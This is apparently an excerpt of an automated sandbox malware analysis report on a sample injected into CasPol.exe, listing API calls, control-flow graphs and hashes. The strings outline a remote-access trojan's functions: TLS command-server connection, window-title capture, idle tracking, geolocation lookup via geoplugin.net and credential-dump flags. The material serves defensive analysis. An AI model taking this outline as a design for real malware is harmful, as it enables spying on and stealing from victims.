                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                          • String ID: /stext "$@TG$@TG
                                                                                                                                                                          • API String ID: 1223786279-723413999
                                                                                                                                                                          • Opcode ID: dbc1b28789681a9ee1592237c9aaecbcec795c68be0e2e7071a14699362cc614
                                                                                                                                                                          • Instruction ID: 54c64e465a66050ec466d83b34d0c9889d7f3cdaa7358c1e9e14d2467042f0e2
                                                                                                                                                                          • Opcode Fuzzy Hash: dbc1b28789681a9ee1592237c9aaecbcec795c68be0e2e7071a14699362cc614
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B0268315083414AC325FB62D891AEFB3E5AFD0348F50483FF58A971E2EF785A49C65A

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1346 404950-404973 call 402093 * 2 call 41b580 1336->1346 1347 404987-404992 call 421ad1 1336->1347 1337->1329 1376 404976-404982 call 420d31 1346->1376 1360 4049c4-4049d1 call 420e97 1347->1360 1361 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1347->1361 1373 4049d3-4049f6 call 402093 * 2 call 41b580 1360->1373 1374 4049f9-404a14 CreateEventW * 2 1360->1374 1361->1376 1373->1374 1374->1317 1376->1320
                                                                                                                                                                          APIs
                                                                                                                                                                          • connect.WS2_32(FFFFFFFF,021D4960,00000010), ref: 004048E0
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                                                                          • Opcode ID: c79575128297767161c001f09357deb0abd53bb53981a43f107bd2a8a47e6bf6
                                                                                                                                                                          • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                                                                                                                                          • Opcode Fuzzy Hash: c79575128297767161c001f09357deb0abd53bb53981a43f107bd2a8a47e6bf6
                                                                                                                                                                          • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                                                                          • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3658366068-0
                                                                                                                                                                          • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                          • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                                                                                          • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                          • API String ID: 911427763-3954389425
                                                                                                                                                                          • Opcode ID: 54061860b470e88efe9c51004f6368ba07ee2c981330a977327270d22d87fefb
                                                                                                                                                                          • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 54061860b470e88efe9c51004f6368ba07ee2c981330a977327270d22d87fefb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1486 40da6f-40da94 call 401f86 1489 40da9a 1486->1489 1490 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1486->1490 1492 40dae0-40dae7 call 41c048 1489->1492 1493 40daa1-40daa6 1489->1493 1494 40db93-40db98 1489->1494 1495 40dad6-40dadb 1489->1495 1496 40dba9 1489->1496 1497 40db9a-40dba7 call 43c11f 1489->1497 1498 40daab-40dab9 call 41b645 call 401f13 1489->1498 1499 40dacc-40dad1 1489->1499 1500 40db8c-40db91 1489->1500 1512 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1492->1512 1513 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1492->1513 1502 40dbae-40dbb3 call 43c11f 1493->1502 1494->1502 1495->1502 1496->1502 1497->1496 1514 40dbb4-40dbb9 call 409092 1497->1514 1520 40dabe 1498->1520 1499->1502 1500->1502 1502->1514 1525 40dac2-40dac7 call 401f09 1512->1525 1513->1520 1514->1490 1520->1525 1525->1490
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LongNamePath
                                                                                                                                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                          • API String ID: 82841172-425784914
                                                                                                                                                                          • Opcode ID: e449d481ed2360d16fb1fd9d50703ad25ac73fcf6fdc62031a2b222bc8cf01a2
                                                                                                                                                                          • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                                                                                          • Opcode Fuzzy Hash: e449d481ed2360d16fb1fd9d50703ad25ac73fcf6fdc62031a2b222bc8cf01a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                                                                                                                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                                                                                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                          • String ID: h]v$h}v
                                                                                                                                                                          • API String ID: 3795512280-2849284857
                                                                                                                                                                          • Opcode ID: 2119f11f23061c4e484226989141e131a621328cb22bd730a221ead51676d936
                                                                                                                                                                          • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2119f11f23061c4e484226989141e131a621328cb22bd730a221ead51676d936
                                                                                                                                                                          • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1666 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1677 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1666->1677 1678 41b3ee-41b3f7 1666->1678 1688 41b3e6-41b3e9 call 401fd8 1677->1688 1689 41b3da-41b3e3 call 41cffa 1677->1689 1679 41b400 1678->1679 1680 41b3f9-41b3fe 1678->1680 1682 41b405-41b410 call 40537d 1679->1682 1680->1682 1688->1678 1689->1688
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                          • String ID: (32 bit)$ (64 bit)$@ev$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$h}v

APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
• __alloca_probe_16.LIBCMT ref: 0044AD5B
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
• __alloca_probe_16.LIBCMT ref: 0044AE40
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
• __freea.LIBCMT ref: 0044AEB0
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• __freea.LIBCMT ref: 0044AEB9
• __freea.LIBCMT ref: 0044AEDE
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
• String ID:
APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
• InternetCloseHandle.WININET(00000000), ref: 0041B4AD
• InternetCloseHandle.WININET(00000000), ref: 0041B4B0
Strings
• http://geoplugin.net/json.gp, xrefs: 0041B448
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
• CloseHandle.KERNEL32(00000000), ref: 0041C4EA
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
• CloseHandle.KERNEL32(00000000), ref: 0041C508
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$CreatePointerWrite
• String ID: xpF
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
• __freea.LIBCMT ref: 10008A08
  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
• __freea.LIBCMT ref: 10008A11
• __freea.LIBCMT ref: 10008A36
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
• Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
• CloseHandle.KERNEL32(00000000), ref: 0040A729
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: hQG
                                                                                                                                                                          • API String ID: 1958988193-4070439852
                                                                                                                                                                          • Opcode ID: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                                                                                          • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                                                                          • _free.LIBCMT ref: 00448353
                                                                                                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
